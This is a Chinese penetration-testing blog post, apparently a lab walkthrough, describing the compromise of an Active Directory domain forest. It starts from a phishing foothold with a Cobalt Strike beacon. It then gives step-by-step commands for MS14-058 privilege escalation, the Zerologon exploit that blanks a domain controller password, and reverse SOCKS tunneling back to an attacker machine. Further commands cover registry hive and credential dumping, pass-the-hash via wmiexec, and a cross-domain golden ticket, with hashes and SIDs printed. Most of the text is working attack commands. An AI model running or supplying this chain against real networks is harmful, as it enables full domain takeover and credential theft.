内网渗透:域森林实战

admin 2022年1月11日05:50:22安全文章评论15 views2207字阅读7分21秒阅读模式
内网渗透:域森林实战
内网渗透:域森林实战

模拟内网实战,以钓鱼已进入内网开始

cs生成exe上线web服务器

内网渗透:域森林实战


设置beacon响应时间为0

内网渗透:域森林实战


第一步:提权

利用ms14-058进行提权

内网渗透:域森林实战


提权成功

内网渗透:域森林实战


进行arp协议信息收集

作用:查看是否有多网卡

指令:

shellarp -a

内网渗透:域森林实战


查看主机信息

作用:可以看到有域,查看补丁进行对应的提权

指令:

shellsysteminfo

内网渗透:域森林实战


收集网络全部信息

作用:可以看到主机名,域信息

指令:

shellipconfig /all

内网渗透:域森林实战


利用nbtscan扫描

作用:扫出真实内网ip进行下一步渗透

内网渗透:域森林实战


内网渗透:域森林实战


进行mimikatz上传

作用:方便进一步内网渗透

内网渗透:域森林实战


扫描是否存在cve2020-1472

回应存在

指令:

lsadump::zerologon /target:域控IP /account:域控主机名$shell mimikatz "lsadump::zerologon /target:10.10.3.6  /account:ziyu$""exit"


内网渗透:域森林实战


上传ew进行代理

指令:

ew_for_Win.exe -s rcsocks -l 1080 -e 888

//将映射出的888端口返回到本地的1080端口

内网渗透:域森林实战


反向碰撞

原理:

我们攻击机开启了代理准备,也就是我们把888端口放到门口,谁指定我们的ip加这个端口碰撞便进行了代理连接

指令:

shellew_for_Win.exe  -s rssocks -d 192.168.58.1(攻击机ip-e888


内网渗透:域森林实战


利用cve2020将域控密码置空

指令:

lsadump::zerologon /target:域控IP /account:域控主机名$ /exploitshell mimikatz "lsadump::zerologon  /target:10.10.3.6  /account:ziyu$ /exploit" "exit"


内网渗透:域森林实战


kali设置代理,这里就是对应之前的代理设置,我们将888放到门口被撞,1080则为我们自己用

内网渗透:域森林实战


获取散列值

作用:制作票据,破解md5等等都可以,个人比较喜欢黄金票据

指令:

proxychains impacket-secretsdump -no-pass -just-dcxiyou.dayu.com/[email protected]10.10.3.6

内网渗透:域森林实战


利用wmiexec连接

作用:连接域控制器了

指令:

proxychainspython3 wmiexec.py -hashes :e35c2b2d95f6ae63b75dbbff5195accb./[email protected]

内网渗透:域森林实战


sam system security.save文件先导出后下载下来,并清理痕迹

指令:

reg save HKLMSYSTEM system.savereg save HKLMSAM sam.savereg save HKLMSECURITY security.saveget system.save ++


内网渗透:域森林实战


获取散列值

作用:获得各用户hash以及还原域防止出现问题

指令:

impacket-secretsdump-sam sam.save -system system.save -security security.save LOCAL

内网渗透:域森林实战


进行还原

指令:

proxychain spython3 reinstall_original_pw.py ZIYU 10.10.3.675df0c2187b6a79e46f26fa2fb16573a

内网渗透:域森林实战


这个时候再用之前获取到的管理员hash登录域控

指令:

proxychains python3 wmiexec.py -hashesaad3b435b51404eeaad3b435b51404ee:e35c2b2d95f6ae63b75dbbff5195accbxiyou.dayu.com/[email protected]10.10.3.6

内网渗透:域森林实战


查看网卡信息,是否进攻正确

内网渗透:域森林实战


上线cs做中转,生成exe进行上线

内网渗透:域森林实战

kali直接上传上线

内网渗透:域森林实战


内网渗透:域森林实战

进行信息收集,这里21段机子未开

内网渗透:域森林实战


内网渗透:域森林实战


上传mimikatz利用信任关系制作票据进行攻击

先获取父子域sid

指令:

shell mimikatz "privilege::debug" "lsadump::lsa /patch/user:dayu$" "lsadump::trust /patch" "exit"

子域:S-1-5-21-4076297317-3311262154-314974380

父域:S-1-5-21-3309395417-4108617856-2168433834-519

krbtgt哈希值:c696e9337845d8ada46612d047e40209

内网渗透:域森林实战


进行黄金票据攻击

显示成功

指令:

shell "kerberos::golden /user:administrator /domain:xiyou.dayu.com/sid:S-1-5-21-4076297317-3311262154-314974380/sids:S-1-5-21-3309395417-4108617856-2168433834-519/krbtgt:c696e9337845d8ada46612d047e40209  /ptt" "exit"

内网渗透:域森林实战

但是这里是失败了

创建域管理员账号

内网渗透:域森林实战


直接通过3389进行黄金票据

内网渗透:域森林实战


终于也是成功了

接着利用wmiexec进行父域的访问

指令:

wmiexec.exe administrator:QWEasd123@10.10.3.5

内网渗透:域森林实战


上传2.exe进行运行上线cs

内网渗透:域森林实战


这一套直线内网流程就结束收工了




原文始发于微信公众号(moonsec):内网渗透:域森林实战

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月11日05:50:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  内网渗透:域森林实战 http://cn-sec.com/archives/732173.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: